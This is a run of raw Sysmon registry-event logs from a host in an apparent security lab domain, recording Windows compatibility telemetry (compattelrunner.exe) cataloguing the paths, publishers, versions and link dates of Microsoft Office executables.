13241300x800000000000000077572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\visicon.exe|298c64a15915f13a\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\visicon.exe 13241300x800000000000000077571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ucmapi.exe|3a5e65afd4555fb0\BinProductVersion16.0.13127.21348 13241300x800000000000000077570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ucmapi.exe|3a5e65afd4555fb0\LinkDate03/06/2021 23:37:20 13241300x800000000000000077569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ucmapi.exe|3a5e65afd4555fb0\Publishermicrosoft corporation 13241300x800000000000000077568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ucmapi.exe|3a5e65afd4555fb0\LowerCaseLongPathc:\program files\microsoft office\root\office16\ucmapi.exe 13241300x800000000000000077567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sscicons.exe|8c93d9f769666121\BinProductVersion16.0.13127.21336 13241300x800000000000000077566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sscicons.exe|8c93d9f769666121\LinkDate03/04/2021 07:51:19 13241300x800000000000000077565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sscicons.exe|8c93d9f769666121\Publishermicrosoft corporation 13241300x800000000000000077564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sscicons.exe|8c93d9f769666121\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\sscicons.exe 13241300x800000000000000077563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sqldumper.exe|f5cecdb30a72910f\BinProductVersion15.0.2000.311 13241300x800000000000000077562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sqldumper.exe|f5cecdb30a72910f\LinkDate03/18/2020 21:16:52 13241300x800000000000000077561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sqldumper.exe|f5cecdb30a72910f\Publishermicrosoft corporation 13241300x800000000000000077560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sqldumper.exe|f5cecdb30a72910f\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx64\microsoft analysis services\as oledb\140\sqldumper.exe 13241300x800000000000000077559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sqldumper.exe|464160c2533d4588\BinProductVersion15.0.2000.311 13241300x800000000000000077558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sqldumper.exe|464160c2533d4588\LinkDate03/18/2020 21:17:11 13241300x800000000000000077557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sqldumper.exe|464160c2533d4588\Publishermicrosoft corporation 13241300x800000000000000077556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sqldumper.exe|464160c2533d4588\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx86\microsoft analysis services\as oledb\140\sqldumper.exe 13241300x800000000000000077555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\spreadsheetcompa|13e8473ddb031adc\BinProductVersion16.0.11929.20112 13241300x800000000000000077554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\spreadsheetcompa|13e8473ddb031adc\LinkDate08/10/2019 04:45:31 13241300x800000000000000077553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\spreadsheetcompa|13e8473ddb031adc\Publishermicrosoft corporation 13241300x800000000000000077552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\spreadsheetcompa|13e8473ddb031adc\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx86\microsoft office\office16\dcf\spreadsheetcompare.exe 13241300x800000000000000077551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\smarttaginstall.|f826035e5377ee3e\BinProductVersion16.0.13127.20164 13241300x800000000000000077550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\smarttaginstall.|f826035e5377ee3e\LinkDate08/10/2020 00:48:42 13241300x800000000000000077549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\smarttaginstall.|f826035e5377ee3e\Publishermicrosoft corporation 13241300x800000000000000077548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\smarttaginstall.|f826035e5377ee3e\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\smart tag\smarttaginstall.exe 13241300x800000000000000077547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\skypeserver.exe|8a108f2e74c54779\BinProductVersion16.0.13127.20204 13241300x800000000000000077546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\skypeserver.exe|8a108f2e74c54779\LinkDate08/15/2020 17:35:28 13241300x800000000000000077545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\skypeserver.exe|8a108f2e74c54779\Publishermicrosoft corporation 13241300x800000000000000077544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\skypeserver.exe|8a108f2e74c54779\LowerCaseLongPathc:\program files\microsoft office\root\office16\skypesrv\skypeserver.exe 13241300x800000000000000077543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\setlang.exe|f09b3851d8a3961f\BinProductVersion16.0.13127.21348 13241300x800000000000000077542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\setlang.exe|f09b3851d8a3961f\LinkDate03/06/2021 23:33:49 13241300x800000000000000077541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\setlang.exe|f09b3851d8a3961f\Publishermicrosoft corporation 13241300x800000000000000077540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\setlang.exe|f09b3851d8a3961f\LowerCaseLongPathc:\program files\microsoft office\root\office16\setlang.exe 13241300x800000000000000077539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\selfcert.exe|e2ec62361730e601\BinProductVersion16.0.13127.21348 13241300x800000000000000077538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\selfcert.exe|e2ec62361730e601\LinkDate03/06/2021 23:33:52 13241300x800000000000000077537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\selfcert.exe|e2ec62361730e601\Publishermicrosoft corporation 13241300x800000000000000077536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\selfcert.exe|e2ec62361730e601\LowerCaseLongPathc:\program files\microsoft office\root\office16\selfcert.exe 13241300x800000000000000077535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sdxhelperbgt.exe|10dd51b76d1cbf67\BinProductVersion16.0.13127.20164 13241300x800000000000000077534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sdxhelperbgt.exe|10dd51b76d1cbf67\LinkDate08/10/2020 01:35:48 13241300x800000000000000077533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sdxhelperbgt.exe|10dd51b76d1cbf67\Publishermicrosoft corporation 13241300x800000000000000077532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sdxhelperbgt.exe|10dd51b76d1cbf67\LowerCaseLongPathc:\program files\microsoft office\root\office16\sdxhelperbgt.exe 13241300x800000000000000077531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sdxhelper.exe|10f28420cb1d5514\BinProductVersion16.0.13127.21348 13241300x800000000000000077530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sdxhelper.exe|10f28420cb1d5514\LinkDate03/06/2021 23:33:52 13241300x800000000000000077529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sdxhelper.exe|10f28420cb1d5514\Publishermicrosoft corporation 13241300x800000000000000077528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\sdxhelper.exe|10f28420cb1d5514\LowerCaseLongPathc:\program files\microsoft office\root\office16\sdxhelper.exe 13241300x800000000000000077527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\scanpst.exe|b3299f6a464b1648\BinProductVersion16.0.13127.21348 13241300x800000000000000077526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\scanpst.exe|b3299f6a464b1648\LinkDate03/06/2021 23:33:52 13241300x800000000000000077525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\scanpst.exe|b3299f6a464b1648\Publishermicrosoft corporation 13241300x800000000000000077524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\scanpst.exe|b3299f6a464b1648\LowerCaseLongPathc:\program files\microsoft office\root\office16\scanpst.exe 13241300x800000000000000077523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pubs.exe|221ddcdbe2c5911d\BinProductVersion16.0.13127.21336 13241300x800000000000000077522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pubs.exe|221ddcdbe2c5911d\LinkDate03/04/2021 07:49:46 13241300x800000000000000077521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pubs.exe|221ddcdbe2c5911d\Publishermicrosoft corporation 13241300x800000000000000077520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pubs.exe|221ddcdbe2c5911d\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\pubs.exe 13241300x800000000000000077519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\protocolhandler.|9fae8d2618c9287e\BinProductVersion16.0.13127.21348 13241300x800000000000000077518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\protocolhandler.|9fae8d2618c9287e\LinkDate03/06/2021 23:35:31 13241300x800000000000000077517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\protocolhandler.|9fae8d2618c9287e\Publishermicrosoft corporation 13241300x800000000000000077516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\protocolhandler.|9fae8d2618c9287e\LowerCaseLongPathc:\program files\microsoft office\root\office16\protocolhandler.exe 13241300x800000000000000077515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pptico.exe|d7bc0ff224c77abb\BinProductVersion16.0.11629.20024 13241300x800000000000000077514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pptico.exe|d7bc0ff224c77abb\LinkDate05/03/2019 09:17:50 13241300x800000000000000077513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pptico.exe|d7bc0ff224c77abb\Publishermicrosoft corporation 13241300x800000000000000077512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pptico.exe|d7bc0ff224c77abb\LowerCaseLongPathc:\program files\microsoft office\root\office16\pptico.exe 13241300x800000000000000077511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pptico.exe|39fd6212a4a4bffe\BinProductVersion16.0.13127.21336 13241300x800000000000000077510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pptico.exe|39fd6212a4a4bffe\LinkDate03/04/2021 07:49:39 13241300x800000000000000077509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pptico.exe|39fd6212a4a4bffe\Publishermicrosoft corporation 13241300x800000000000000077508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pptico.exe|39fd6212a4a4bffe\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\pptico.exe 13241300x800000000000000077507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\powerpnt.exe|d26b5ec93e6588c4\BinProductVersion16.0.13127.21348 13241300x800000000000000077506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\powerpnt.exe|d26b5ec93e6588c4\LinkDate03/06/2021 23:40:58 13241300x800000000000000077505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\powerpnt.exe|d26b5ec93e6588c4\Publishermicrosoft corporation 13241300x800000000000000077504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\powerpnt.exe|d26b5ec93e6588c4\LowerCaseLongPathc:\program files\microsoft office\root\office16\powerpnt.exe 13241300x800000000000000077503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pj11icon.exe|3eb73d0357cb7ab9\BinProductVersion16.0.13127.21336 